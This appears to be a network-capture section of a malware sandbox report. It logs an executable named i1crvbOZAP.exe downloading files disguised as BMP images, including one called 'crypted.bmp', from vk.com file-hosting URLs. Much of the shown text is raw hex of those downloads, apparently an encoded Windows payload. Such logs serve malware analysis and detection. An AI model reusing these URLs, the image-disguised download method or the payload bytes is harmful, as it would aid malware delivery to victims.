2024-03-28 08:15:07 UTC	16384	IN	Data Raw: 95 7d ee 25 7a 97 7d e4 89 88 8d d6 8d 88 52 f5 4d 5e b8 e8 5a b8 ef 8c 73 9f db 72 bf 00 f0 d7 f3 d8 b4 6e c2 7c e3 39 14 f6 ae 75 84 88 0d d2 c0 3c 47 4a b9 42 0d 60 30 63 5f 3b 98 4b fc 05 54 89 15 40 68 dd fd e0 69 c4 b0 a9 2b 7c 8c 6f 27 e8 21 f0 6a af 1a 79 7d 79 de ee 84 e4 c7 f5 b5 ae a6 e2 1d 40 08 a4 4d 51 62 f2 dc 10 0d dd 8a 6b ec 54 37 3e 3e 4e c1 1d 98 33 65 b3 28 07 2c cc de 8c 86 8b 6b 03 05 03 31 4d d1 ab 10 5b 85 e2 80 de a0 90 48 1a 6a 31 75 fb 83 41 13 ec 26 db ef ac 67 5a c1 e4 1c 56 f8 7f 6d fe 10 03 8d f2 2a 12 c5 93 73 bc 34 eb 70 07 48 84 74 82 ef 9c 57 59 bf e8 a2 fc f4 77 99 46 29 45 d3 c1 67 86 6c 7d 29 f2 55 ea 92 f6 18 d5 9f 4e 37 09 28 34 9c 3a 02 05 45 06 a1 32 25 68 20 47 de be de a5 1c 3b 29 bf 20 8c 2e f8 8a ee 02 44 a2 Data Ascii: }%z}RM^Zsrn\|9u<GJB`0c_;KT@hi+\|o'!jy}y@MQbkT7>>N3e(,k1M[Hj1uA&gZVm*s4pHtWYwF)Egl})UN7(4:E2%h G;) .D
2024-03-28 08:15:07 UTC	16384	IN	Data Raw: 81 5a 83 85 2f a6 0d 81 da a4 c3 5e af 73 5d 96 86 72 c7 5c 2e 33 43 55 ad 6e 9d 95 7a 5c 72 20 6f 92 ec 1b bf e9 82 2d fd a1 fa f1 cd d2 be 8d 83 93 aa 34 07 69 ab 70 81 56 ec c2 e4 54 63 d8 a4 06 99 18 3d 3a ed c3 9a 31 3f 2d fa 4d 2f b7 1c 6f a8 37 1b 16 4c 7a 91 7f a8 93 f5 76 ad 08 b8 40 45 a5 01 a7 36 a4 a2 a0 06 ea 37 24 48 b9 9e 66 4d 8b ff 69 68 70 87 96 04 74 26 75 cc 65 62 32 ec 97 72 04 d5 d9 10 66 98 9a 17 c2 93 37 81 4d 34 f1 a3 98 0b d5 1b 28 0f 8a a1 36 d5 e0 a7 e4 e7 2b 55 d6 1b a8 5a d9 dc 8a f8 cf 94 f4 93 7f 8e b4 83 d6 48 2a d9 14 79 19 84 21 99 02 7a c0 e6 b2 94 a6 66 8c 7d d3 3f 62 97 5a 48 78 19 a4 73 1c 6e 82 e4 84 16 29 f9 0e 68 97 eb 9c 73 e9 ed ed c8 1f 5e b0 5d e2 29 82 23 50 98 31 9a 30 2c 2d 31 b9 cd f1 ad 2f 21 68 86 fd fd Data Ascii: Z/^s]r\.3CUnz\r o-4ipVTc=:1?-M/o7Lzv@E67$HfMihpt&ueb2rf7M4(6+UZH*y!zf}?bZHxsn)hs^])#P10,-1/!h
2024-03-28 08:15:07 UTC	16384	IN	Data Raw: 0c 8b 1f 69 ea 15 69 f7 48 59 aa 94 a8 86 76 89 8b fb 33 0d 35 8d 14 82 99 74 44 17 e2 83 cf 85 b2 10 5d 8d 6b db b6 0d 94 7c e1 87 d7 20 d3 c3 5c 6e 66 1b c5 52 32 08 63 ec 8e d7 cc 2e e4 57 02 d8 19 06 b5 35 c8 0f 93 12 80 7f 13 47 f3 20 8e 0a 20 b5 a6 e2 3f 30 03 ae 5a b2 2c 70 44 b5 fb 95 cf 52 89 c1 26 d4 be b3 98 04 b9 b1 36 8f 77 e8 a0 eb cb 74 35 00 62 8f 1a 44 60 76 7b 16 b0 a7 ee 84 87 1e d9 f9 89 77 b7 81 e4 1b ee 59 47 62 3a aa 8a 90 6d 58 fb cf cb 89 87 5e 91 5f ac 90 d2 aa 16 13 bb 3d d4 80 73 e4 da d2 e7 33 0c a7 f1 1c 8d 6c e7 d5 04 76 b0 9d b0 37 ef 96 72 bb 58 d9 de db b6 bf 2e 6f f0 fc ee ca ee 8d 25 6b f1 3c 16 4f b6 91 c1 38 dc f3 10 08 32 bb 53 a5 95 e0 4a 9b c9 5a d6 de 5d 14 60 68 26 88 68 f2 41 a9 46 b8 72 6d 37 27 ea bb fd 4b 84 Data Ascii: iiHYv35tD]k\| \nfR2c.W5G ?0Z,pDR&6wt5bD`v{wYGb:mX^_=s3lv7rX.o%k<O82SJZ]`h&hAFrm7'K
2024-03-28 08:15:07 UTC	16384	IN	Data Raw: 84 6c 87 9c b4 12 4c 3c 4c 8e e3 00 eb 88 d1 34 47 3e a9 57 be 8b c7 fd df db c7 dc e9 19 3b e9 b9 60 a1 a2 91 dc 2a e6 e6 43 9a 05 dd 98 e6 7d 2d 0c 25 91 45 03 7b 87 c1 40 c5 2b 53 d9 95 2b e3 c5 96 4f 73 cd f1 0f 9c 25 21 8c f9 a3 48 d0 39 ba cf c6 f9 f9 f2 e1 f3 b3 37 70 43 53 7f 9e 9d 3f ff 6b cb 97 47 28 9c d6 f6 18 cf 6f a2 cc 42 c9 55 20 2e ae c8 1b 46 c4 e3 08 5e 01 14 b7 17 61 b0 53 fb 20 99 b9 7b 53 3f 48 c0 c6 e8 aa 1e b3 19 43 da 2d 9a 13 bb 5f a8 a0 39 c9 ab d1 fb bb 74 29 13 8d a7 47 c2 c4 f9 2a df e7 36 ea f5 b7 4a 50 1f 35 04 e0 ae c0 6d 37 f4 61 34 0e 67 33 2b f1 4f 3f cc db f7 60 21 cc e7 00 e8 50 d0 c9 bd 4c 9c d2 bf 22 ec 31 8d 80 7c a1 08 47 49 0d 25 91 74 bc 51 f6 21 01 22 da b6 7e 3d ab 7f a8 57 50 ff c8 72 fe a8 73 59 c8 87 ef ad Data Ascii: lL<L4G>W;`C}-%E{@+S+Os%!H97pCS?kG(oBU .F^aS {S?HC-_9t)G6JP5m7a4g3+O?`!PL"1\|GI%tQ!"~=WPrsY
2024-03-28 08:15:07 UTC	16384	IN	Data Raw: 93 ee 77 91 58 d5 a6 99 6b af 9a 85 ba dd 59 e6 44 0e 7a 91 db 4a fc 2d ea d9 23 eb d6 8f b4 fe 00 9a 32 42 eb 9d 0b 4c b8 68 55 23 0d 18 b5 a4 c6 b9 2b c2 4b f3 05 33 94 da 80 ee 0e 11 bd c9 b9 1b b9 61 6a 8d 75 f3 6d eb a5 e6 5b 9f 8a f1 5a 3c a6 51 b4 97 d2 64 27 8d 8f ea 4c d7 58 77 1f 7a b0 e4 9e 1c 9a 79 c3 41 1e 64 c7 30 29 5c 9a f9 ea ac a1 c8 c8 93 56 3b 74 23 b6 b6 55 54 8c ce b6 70 5e 19 b2 16 42 f0 73 c5 67 cc a0 63 a1 c0 90 4c 51 7c 92 dd 21 2d 45 2c 62 05 76 63 c3 a3 d2 28 79 78 7e a3 5c 77 84 95 ea fb 03 79 be 0b 62 9d d2 33 78 2f a2 44 88 f4 6e 7b c7 08 e5 a4 19 95 b3 75 e1 2a ee 94 8e a8 6d bf 26 f6 ea bf f7 3a 07 5b 21 0d 4b 8e 84 99 3e 98 57 34 5b b4 2b 9e 94 06 c8 a5 44 43 44 26 3d 7d 25 4d 58 d0 d2 7c 79 4c 38 a6 dc 73 42 7c 4d 0e 35 Data Ascii: wXkYDzJ-#2BLhU#+K3ajum[Z<Qd'LXwzyAd0)\V;t#UTp^BsgcLQ\|!-E,bvc(yx~\wyb3x/Dn{u*m&:[!K>W4[+DCD&=}%MX\|yL8sB\|M5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49793	93.186.225.194	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:07 UTC	431	OUT	GET /doc329118071_676372534?hash=mU6chkoRzazMAQommLzbARbrOtVcQjV2nCZO5HLxzXD&dl=F4ujiRXkvZIoPyzlUTSDKXz4IzA9Z6pINj1zLZkzj5w&api=1&no_preview=1#a02 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=3; remixstlid=9117847083090382120_GyCezWnUcFkAoaulqrTGNL6Wa7T5v9s33neHqUGXYzo; remixir=1
2024-03-28 08:15:07 UTC	928	IN	HTTP/1.1 302 Found Server: kittenx Date: Thu, 28 Mar 2024 08:15:07 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: close X-Powered-By: KPHP/7.4.116219 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Location: https://psv4.userapi.com/c236331/u329118071/docs/d4/678b61126bd7/02.bmp?extra=u4x5o5e99u4NPac3pUrfyS7L46i-_X_MGUwFdXNYr1R5xwrrHeAQn1AOaKPAnboi5DP6qlx557JFMC-SX4vRmTo3ahIllC2PiaQqxxkkXoihUJfSh5X-gznnl4k0mxECRLjnx8NqK0MQ78M X-Frontend: front661402 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: w2AaOGnSuQJzVDukNk_al_20Kmvqjg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49794	95.142.206.1	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:09 UTC	421	OUT	GET /c240331/u329118071/docs/d55/1831d7ba0e1f/crypted.bmp?extra=HVpBxhMcgZ3WEnQYJhUos_wUIgTD581u41drks9QawpVXgm6isoag9sFNXT6kFUNfmKUK0BATli7elFkZwxPtLGKC8Bc8453Aje1s8sxPwGBrTh5BDTLmWOuBUzVCNDrUBjJqzwS0s4DvCA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: sun6-21.userapi.com Connection: Keep-Alive
2024-03-28 08:15:09 UTC	585	IN	HTTP/1.1 200 OK Server: kittenx Date: Thu, 28 Mar 2024 08:15:09 GMT Content-Type: image/x-ms-bmp Content-Length: 285324 Connection: close Last-Modified: Wed, 27 Mar 2024 13:41:27 GMT ETag: "66042207-45a8c" Expires: Sat, 27 Apr 2024 08:15:09 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic X-Trace-Id: qJQcL8SyqwkZJ43ThmMerOVuv10FWA Accept-Ranges: bytes
2024-03-28 08:15:09 UTC	15799	IN	Data Raw: dd cc 66 55 58 4f 85 15 16 15 15 15 11 15 15 15 ea ea 15 15 ad 15 15 15 15 15 15 15 ff 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 95 15 15 15 1b 80 af 1b 15 a1 1c d8 34 ad 14 59 d8 34 41 7d 7c 66 35 65 67 7a 72 67 74 78 35 76 74 7b 7b 7a 61 35 77 70 35 67 60 7b 35 7c 7b 35 51 5a 46 35 78 7a 71 70 3b 18 18 1f 31 15 15 15 15 15 15 15 45 50 15 15 59 14 16 15 f5 16 11 73 15 15 15 15 15 15 15 15 f5 15 1b 14 1e 14 1e 15 15 17 11 15 15 1d 15 15 15 15 15 15 db 34 11 15 15 35 15 15 15 ff 11 15 15 15 ff 15 15 35 15 15 15 17 15 15 11 15 15 15 15 15 15 15 13 15 15 15 15 15 15 15 15 95 11 15 15 17 15 15 15 15 15 15 16 15 75 90 15 15 01 15 15 01 15 15 15 15 01 15 15 01 15 15 15 15 15 15 01 15 15 15 15 15 15 Data Ascii: fUXO4Y4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;1EPYs455u
2024-03-28 08:15:09 UTC	16384	IN	Data Raw: 15 15 15 35 2d 15 15 15 4d eb 1b 4b 15 35 bf 15 15 15 2d ff ce ea ea eb 19 01 15 35 18 15 15 15 eb 19 16 15 89 35 b8 14 15 15 2d 3d ce ea ea 04 3a 9b 7c 98 08 15 15 14 06 19 35 91 15 15 15 2d 06 ce ea ea 04 08 04 1a 0d 4d 04 71 0d 84 89 35 f1 14 15 15 eb 1b 67 15 2d e3 cf ea ea eb 19 04 15 35 1f 15 15 15 eb 19 41 15 89 35 d2 14 15 15 3d ab 15 15 13 2f c8 cf ea ea 33 35 81 15 15 15 2d c7 cf ea ea 35 e6 15 15 15 35 44 15 15 15 4c eb 1b 4b 15 35 81 14 15 15 2d ac cf ea ea eb 19 04 15 35 03 15 15 15 eb 19 41 15 89 35 36 17 15 15 2d b4 cf ea ea 04 09 0c 80 5f 89 35 20 14 15 15 2d 84 cf ea ea eb 19 04 15 35 09 15 15 15 eb 19 41 15 89 35 06 17 15 15 3d ab 15 15 13 2f 61 cf ea ea 33 35 92 14 15 15 2d 7c cf ea ea 6b 07 15 15 11 04 80 04 5d 7f 4d 99 26 15 15 14 04 Data Ascii: 5-MK5-55-=:\|5-Mq5g-5A5=/35-55DLK5-5A56-_5 -5A5=/a35-\|k]M&
2024-03-28 08:15:09 UTC	16384	IN	Data Raw: 14 15 15 15 15 cf 0b 15 15 44 15 15 15 3e 80 15 15 1f 14 15 15 0a 15 15 14 17 15 15 15 e5 53 15 15 3a 14 15 15 80 5d 15 15 25 15 15 15 15 15 15 15 15 15 15 15 06 53 15 15 73 11 15 15 6c 5f 15 15 27 15 15 15 0a 15 15 14 0e 25 11 15 ee 15 15 15 01 15 15 04 17 61 24 15 15 14 7a 98 15 15 1f 3d 9b 15 15 1f 2c 04 15 15 15 17 61 24 15 15 14 7a 98 15 15 1f 1f c8 c6 15 15 15 c8 13 15 15 15 33 c8 15 15 15 15 15 17 61 24 15 15 14 7a 7e 15 15 1f 7a 9a 15 15 1f 7a 99 15 15 1f 67 ff 10 15 65 67 47 10 15 65 7a 85 15 15 1f 3d 9b 15 15 1f 2c 3f 15 15 15 17 61 24 15 15 14 7a 7e 15 15 1f 7a 9a 15 15 1f 7a 99 15 15 1f 67 ff 10 15 65 67 47 10 15 65 7a 85 15 15 1f 1f c8 7a 15 15 15 c8 13 15 15 15 33 c8 15 15 15 15 15 17 7a 9e 15 15 1f 67 41 10 15 65 7a 84 15 15 1f 17 03 98 0a Data Ascii: D>S:]%Ssl_'%a$z=,a$z3a$z~zzgegGez=,?a$z~zzgegGezz3zgAez
2024-03-28 08:15:09 UTC	16384	IN	Data Raw: 61 7a 41 67 74 7b 66 73 7a 67 78 15 47 70 63 70 67 66 70 15 52 70 61 5b 74 78 70 15 54 66 66 70 78 77 79 6c 5b 74 78 70 15 52 70 61 45 60 77 79 7c 76 5e 70 6c 41 7a 7e 70 7b 15 66 70 61 4a 58 7a 71 70 15 56 7c 65 7d 70 67 58 7a 71 70 15 56 67 70 74 61 70 51 70 76 67 6c 65 61 7a 67 15 56 67 6c 65 61 7a 46 61 67 70 74 78 15 56 67 6c 65 61 7a 46 61 67 70 74 78 58 7a 71 70 15 42 67 7c 61 70 15 53 79 60 66 7d 53 7c 7b 74 79 57 79 7a 76 7e 15 72 70 61 4a 50 7b 61 67 6c 45 7a 7c 7b 61 15 7a 65 4a 50 64 60 74 79 7c 61 6c 15 41 24 66 4f 77 24 43 63 51 15 41 67 7c 78 15 53 67 7a 78 57 74 66 70 23 21 46 61 67 7c 7b 72 15 50 7b 76 7a 71 7c 7b 72 15 46 6c 66 61 70 78 3b 41 70 6d 61 15 72 70 61 4a 40 7b 7c 76 7a 71 70 15 52 70 61 46 61 67 7c 7b 72 15 5b 63 44 26 21 60 Data Ascii: azAgt{fszgxGpcpgfpRpa[txpTffpxwyl[txpRpaE`wy\|v^plAz~p{fpaJXzqpV\|e}pgXzqpVgptapQpvgleazgVgleazFagptxVgleazFagptxXzqpBg\|apSy`f}S\|{tyWyzv~rpaJP{aglEz\|{azeJPd`ty\|alA$fOw$CcQAg\|xSgzxWtfp#!Fag\|{rP{vzq\|{rFlfapx;ApmarpaJ@{\|vzqpRpaFag\|{r[cD&!`
2024-03-28 08:15:09 UTC	16384	IN	Data Raw: 67 74 61 7a 67 1b 76 60 67 67 70 7b 76 6c 46 6c 78 77 7a 79 07 74 7b 66 7c 56 60 67 67 70 7b 76 6c 46 6c 78 77 7a 79 1c 7b 74 7b 46 6c 78 77 7a 79 03 65 7a 66 7c 61 7c 63 70 5c 7b 73 7c 7b 7c 61 6c 46 6c 78 77 7a 79 03 7b 70 72 74 61 7c 63 70 5c 7b 73 7c 7b 7c 61 6c 46 6c 78 77 7a 79 02 65 70 67 76 70 7b 61 51 70 76 7c 78 74 79 46 70 65 74 67 74 61 7a 67 55 65 70 67 76 70 7b 61 52 67 7a 60 65 46 70 65 74 67 74 61 7a 67 18 65 70 67 76 70 7b 61 46 6c 78 77 7a 79 1b 65 70 67 58 7c 79 79 70 46 6c 78 77 7a 79 19 7b 74 61 7c 63 70 51 7c 72 7c 61 66 1f 78 4a 71 74 61 74 5c 61 70 78 06 7b 60 78 77 70 67 51 70 76 7c 78 74 79 51 7c 72 7c 61 66 55 76 60 67 67 70 7b 76 6c 51 70 76 7c 78 74 79 51 7c 72 7c 61 66 02 76 60 67 67 70 7b 76 6c 45 7a 66 7c 61 7c 63 70 45 74 Data Ascii: gtazgv`ggp{vlFlxwzyt{f\|V`ggp{vlFlxwzy{t{Flxwzyezf\|a\|cp\{s\|{\|alFlxwzy{prta\|cp\{s\|{\|alFlxwzyepgvp{aQpv\|xtyFpetgtazgUepgvp{aRgz`eFpetgtazgepgvp{aFlxwzyepgX\|yypFlxwzy{ta\|cpQ\|r\|afxJqtat\apx{`xwpgQpv\|xtyQ\|r\|afUv`ggp{vlQpv\|xtyQ\|r\|afv`ggp{vlEzf\|a\|cpEt
2024-03-28 08:15:09 UTC	16384	IN	Data Raw: 04 d0 f4 44 b2 5a 5b 56 12 07 41 f7 a6 de 18 1a e1 2c 40 24 d2 97 26 1d da bd a7 08 b6 a0 83 4f 7f 19 23 68 6b 8b 03 9a d4 48 d7 24 e5 3e c8 81 c2 90 94 58 b3 65 0a ca 6c 13 35 d3 b4 b3 d7 05 41 b1 05 03 2b 1a 3d 32 94 64 57 78 78 7f c0 ab 8d 20 d0 fc a3 c5 bb fc 19 5a ad fd 6b a5 15 05 96 ca 6c 63 b9 22 3c 77 44 00 db 43 0c 4f b1 06 89 bb e0 40 ee 2c 50 f6 7b 7c 48 a6 6c b9 7b 1c 80 ff 64 f9 e7 20 c3 6f d9 b2 5c eb 51 55 b7 c0 06 14 73 c3 d3 b4 94 e3 b7 e5 b4 02 81 65 6d a9 e1 c1 d8 2d 75 cc 5e d4 bf 2a a1 48 fd a6 53 0a b4 cc dd ec e6 f2 dc fc 6e 2d 08 3d aa 8f 80 b2 d6 b8 20 52 9f e5 b0 84 52 4f 70 c6 b8 16 53 7e 52 8d fe ce c8 64 73 93 db af 42 b0 ac 1b 04 ac 71 82 ce 6e 97 bd d3 c4 db 38 bb 0a 45 2d a5 83 43 d9 0b f3 0b 74 47 db 20 a0 15 91 b2 3e 82 Data Ascii: DZ[VA,@$&O#hkH$>Xel5A+=2dWxx Zklc"<wDCO@,P{\|Hl{d o\QUsem-u^*HSn-= RROpS~RdsBqn8E-CtG >
2024-03-28 08:15:09 UTC	16384	IN	Data Raw: f9 df 83 6f f4 83 9d 6d da 19 04 d3 f4 10 b6 f4 10 b0 68 0a 35 4e d9 ff 7c 81 2e f8 06 12 df 8b 27 87 31 dd 4e 26 2b 98 14 53 60 0a 1d de bd ed ca ca 85 72 84 e4 2f 99 97 81 59 2b d7 8e 15 69 9f ec a3 cb 61 5e 26 52 b1 a2 83 05 66 fd fb d3 dd ff e6 c1 f8 13 99 7b a4 d4 a2 dd f8 34 78 cf c3 86 e4 a4 af 43 55 21 42 36 25 14 1e ec 76 5b f3 55 6d 76 0d cc 7c 80 6f 99 cf d8 e7 24 61 54 49 0d 35 f1 77 5b d4 ae 64 27 fe e7 ef 53 e5 98 69 39 b3 46 72 6d 54 3d aa b3 3b 9d eb 64 3d 46 c6 ae 83 a1 ff 8d f3 61 4d 7e 11 62 d5 72 a7 b9 5b 45 ac 2d ab 8b 66 31 7c 3c 07 5b f1 27 70 77 a8 13 48 09 55 ad 3b cf e7 30 56 71 90 e1 3a 17 b2 02 32 dd f2 99 86 82 cd ab b1 c0 37 a0 db 1d fa 45 52 fb 93 0d de ec 87 54 97 74 f3 09 c0 a9 17 be 4c 66 36 ee de e2 f9 0d 89 37 25 94 70 Data Ascii: omh5N\|.'1N&+S`r/Y+ia^&Rf{4xCU!B6%v[Umv\|o$aTI5w[d'Si9FrmT=;d=FaM~br[E-f1\|<['pwHU;0Vq:27ERTtLf67%p
2024-03-28 08:15:09 UTC	16384	IN	Data Raw: c8 11 74 eb 89 36 88 a1 0c 0e 63 84 4b fa 67 14 e5 7a 3e e9 43 8e b3 da 83 89 c2 58 ce 68 06 f7 e8 19 e8 fe a1 85 e9 3d 02 0a d7 87 3b 93 2e 7e c4 2b 1c 34 9f fb 16 83 b6 9a 7e 85 4e 62 38 d0 f8 30 e3 e7 37 6c d0 6d 4e 02 8f ec d2 b5 42 a8 d0 c3 89 e1 42 32 7d d6 79 e1 34 ee f9 51 ba 38 dd 92 76 15 a4 5f 08 22 ff 35 61 03 0a d2 e9 f0 22 28 32 f2 e9 86 89 bb b2 67 17 ac f3 09 41 b3 b0 ac ac 2c 34 8b f5 48 bd 0e 66 13 64 bb 29 bc 32 1e 79 99 84 9b 36 2e a3 f1 21 0c e0 ee 08 12 5a 51 c6 a1 be 44 99 a4 c3 70 0c 5c 68 bc 9f 7b 29 86 b3 45 42 2b ae 75 25 ad f6 69 3f fe bb 77 3b 00 ef c6 f0 e7 e9 d6 2a 30 1c 77 db bb 5f 82 2f 67 3a 6a 37 51 e9 7f 18 a0 e3 5c f2 ca 32 ed c8 19 fc 53 e9 7a 7b fa 2b eb 49 47 af b0 34 ff ce 0e e3 34 47 81 44 df 11 96 56 64 d3 51 3c Data Ascii: t6cKgz>CXh=;.~+4~Nb807lmNBB2}y4Q8v_"5a"(2gA,4Hfd)2y6.!ZQDp\h{)EB+u%i?w;*0w_/g:j7Q\2Sz{+IG44GDVdQ<
2024-03-28 08:15:09 UTC	16384	IN	Data Raw: 88 91 7c b1 7a 17 98 90 a2 5f 42 ff 15 d4 1f cf ff 73 d8 d0 27 09 e8 1f 7e 04 95 2f 4b 38 69 45 d5 49 9b 8e 80 05 85 1d 13 80 de 68 91 0f 1d e5 99 50 35 90 6c 6b 06 66 d5 01 02 88 1a 3b fa 9b ab 28 bb 2f ca 87 fd 20 10 6a 6f 80 c0 2c 89 06 af 3e 4c 92 0e a7 77 5c 53 15 a3 42 6e b0 94 79 11 85 cc f5 d5 d0 ed 5f 15 05 39 6b 71 92 77 e0 1d b1 be f3 3e b7 d9 fe 55 3d 89 d3 79 07 62 bd 63 40 ae 1c 7d 6e 45 0d 5d bb 34 77 71 4f a4 d8 7f 4c 04 9a c7 90 24 c7 36 a6 dd 0c a6 ff 90 91 13 9a d8 8e 5d 97 b3 88 90 d1 a2 79 d0 b7 23 8a 55 02 f9 88 39 30 be 9f a2 10 16 f4 a9 24 17 3e 3e 7b fe 1b 4f a6 bf 39 9b 7e 72 17 df 1a 45 ef 9b 2e 33 20 32 72 5d 55 88 cd 6f b5 fe 72 34 83 cb 4e 97 ba d2 4d 49 91 f4 43 8b 87 80 33 16 be 7c 13 2b 89 fe 91 99 29 bb 00 43 a5 36 f5 ac Data Ascii: \|z_Bs'~/K8iEIhP5lkf;(/ jo,>Lw\SBny_9kqw>U=ybc@}nE]4wqOL$6]y#U90$>>{O9~rE.3 2r]Uor4NMIC3\|+)C6
2024-03-28 08:15:09 UTC	16384	IN	Data Raw: 66 07 eb c6 24 2e 87 03 b9 ba c2 e6 37 a6 73 13 6d 63 7f 58 5d ab 3e bd 84 a6 03 56 0f c2 69 b1 15 cf 60 70 9c e9 a3 95 3f a1 37 e8 5d 2d dd af b7 2e e9 1a 69 15 90 81 ee 93 e5 98 38 36 3c 9d 01 e9 f9 e6 81 d1 2f 4e aa 02 86 18 2a 55 5d cb b0 38 b7 7f ee 4a be ee 09 8a 65 bb f2 7d b3 df 8a 05 6a cb de d7 26 d5 d3 aa dc 1e a7 0f 98 59 83 f1 6d 66 01 7c 7f 41 d5 18 df d8 a2 1b 67 8b 6b e8 cb 39 15 9a fc 13 4a 25 d3 05 81 e6 5f d5 54 c9 2b 7b 9f 3b ad 97 d0 ce 8f 54 51 a7 43 18 b1 bd 4d 35 d5 4d 6d de d7 de a9 15 8e 7f fe 3c fb 1f b2 4f 6f f0 a5 92 36 22 33 b5 f5 ee f8 96 f9 50 50 8e e9 07 6c e8 17 e9 35 46 26 a6 03 5f 72 32 99 e1 9b 4b 15 a2 08 36 88 f1 0c aa f5 ef f2 19 38 5a c2 86 f9 8c ba 7b 5e ef 9c 52 8b c5 82 26 e7 26 29 9d 08 03 ba 3e 13 53 c6 a1 89 Data Ascii: f$.7smcX]>Vi`p?7]-.i86</N*U]8Je}j&Ymf\|Agk9J%_T+{;TQCM5Mm<Oo6"3PPl5F&_r2K68Z{^R&&)>S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49795	87.240.190.89	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:10 UTC	412	OUT	GET /c236331/u329118071/docs/d4/678b61126bd7/02.bmp?extra=u4x5o5e99u4NPac3pUrfyS7L46i-_X_MGUwFdXNYr1R5xwrrHeAQn1AOaKPAnboi5DP6qlx557JFMC-SX4vRmTo3ahIllC2PiaQqxxkkXoihUJfSh5X-gznnl4k0mxECRLjnx8NqK0MQ78M HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: psv4.userapi.com Connection: Keep-Alive
2024-03-28 08:15:11 UTC	572	IN	HTTP/1.1 200 OK Server: kittenx Date: Thu, 28 Mar 2024 08:15:10 GMT Content-Type: image/x-ms-bmp Content-Length: 5099604 Connection: close Last-Modified: Thu, 28 Mar 2024 07:43:16 GMT ETag: "66051f94-4dd054" Accept-Ranges: bytes Expires: Thu, 04 Apr 2024 08:15:10 GMT Cache-Control: max-age=604800 X-Frontend: front225202 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Methods: GET, HEAD, OPTIONS Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=15768000 X-Trace-Id: EieEors-ZknexHcG3WneC_n03og4Zw Accept-Ranges: bytes
2024-03-28 08:15:11 UTC	15812	IN	Data Raw: dd cc 66 55 58 4f 85 15 16 15 15 15 11 15 15 15 ea ea 15 15 ad 15 15 15 15 15 15 15 ff 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 95 15 15 15 1b 80 af 1b 15 a1 1c d8 34 ad 14 59 d8 34 41 7d 7c 66 35 65 67 7a 72 67 74 78 35 76 74 7b 7b 7a 61 35 77 70 35 67 60 7b 35 7c 7b 35 51 5a 46 35 78 7a 71 70 3b 18 18 1f 31 15 15 15 15 15 15 15 45 50 15 15 59 14 16 15 1f 1a df ca 15 15 15 15 15 15 15 15 f5 15 1b 14 1e 14 45 15 15 65 5e 15 15 c7 14 15 15 15 15 15 cb 9b 5e 15 15 35 15 15 15 b5 5e 15 15 15 ff 15 15 35 15 15 15 17 15 15 11 15 15 15 15 15 15 15 11 15 15 15 15 15 15 15 15 b5 58 15 15 17 15 15 53 1a 5b 15 17 15 ff 90 15 15 01 15 15 01 15 15 15 15 01 15 15 01 15 15 15 15 15 15 1a 15 15 15 15 15 15 Data Ascii: fUXO4Y4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;1EPYEe^^5^5XS[
2024-03-28 08:15:11 UTC	16384	IN	Data Raw: 2f 62 ea ea ea 33 2d 78 ea ea ea 03 06 15 35 15 15 15 15 3d 00 15 15 13 2f 4a ea ea ea 33 35 15 15 15 15 2d 41 ea ea ea 04 0d 79 04 0c 79 4e 3d 83 15 15 13 a2 06 06 35 16 15 15 15 2d 2e ea ea ea 15 15 15 06 25 16 15 cb 15 15 15 0f 15 15 04 3e 10 3d 37 88 50 41 35 16 15 15 15 eb 1b 1c 15 2d 15 15 15 15 eb 19 1c 15 50 12 15 15 15 2b 15 15 15 66 15 15 15 47 15 15 15 9b 15 15 15 97 15 15 15 5a 15 15 15 37 15 15 15 2d 2c 15 15 15 03 06 15 35 14 15 15 15 3d 81 15 15 13 2f dd ea ea ea 33 35 14 15 15 15 2d a8 ea ea ea 04 0f 04 0e cd 06 06 35 11 15 15 15 3d 81 15 15 13 2f b2 ea ea ea 33 2d 88 ea ea ea 04 0d 04 0c cd 06 06 35 13 15 15 15 2d 85 ea ea ea 04 15 3f 04 03 04 02 cd 06 06 35 15 15 15 15 3d 81 15 15 13 2c 62 ea ea ea 33 35 15 15 15 15 2d 79 ea ea ea 2d c2 Data Ascii: /b3-x5=/J35-AyyN=5-.%>=7PA5-P+fGZ7-,5=/35-5=/3-5-?5=,b35-y-
